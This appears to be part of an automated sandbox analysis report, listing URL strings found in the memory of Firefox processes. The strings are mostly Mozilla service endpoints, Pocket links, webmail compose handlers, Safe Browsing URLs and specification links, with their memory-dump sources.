Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000018.00000002.2635204415.00000238F4703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiments/screenshots/schema.jsonshims/private-brow
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotshttps://screenshots.firefox.com/
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/1072
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/whatwg/html/issues/8610
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Changes
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#bidi-rendering
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#flow-content-3
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#hidden-elements
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#the-details-and-summary-elements
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#the-hr-element-2
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000023.00000002.3350268483.00000286327C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000023.00000002.3350268483.00000286327C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3350268483.00000286327C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3312278388.000002862F706000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3297087442.000002862E515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://pdf.js/PdfJsDefaultPreferences.sys.mjsM
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000018.00000002.2625566496.00000238E76DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F414372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2938979510.0000028621AD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339121279.00000286320B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.comS
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000023.00000002.3317049922.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%shttps://email.seznam.cz/newMessageScreen?mail
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.combrowser.fixup.alternate.enabledPanelUI-developer-tools-viewWebChannelMes
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000023.00000002.3326407807.0000028631538000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3336295224.0000028631E45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339121279.00000286320B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/isUnderHiddenEmbedderElement
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/isUnderHiddenEmbedderElementpictureinpicture
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.combrowser.handlers.migrationsaccount-connection-connectednetwork.proxy.
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comzA8
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3334627067.0000028631DB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelbrowser.engagement.session_time_including_suspen
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelchrome://extensions/content/schemas/manifest.jso
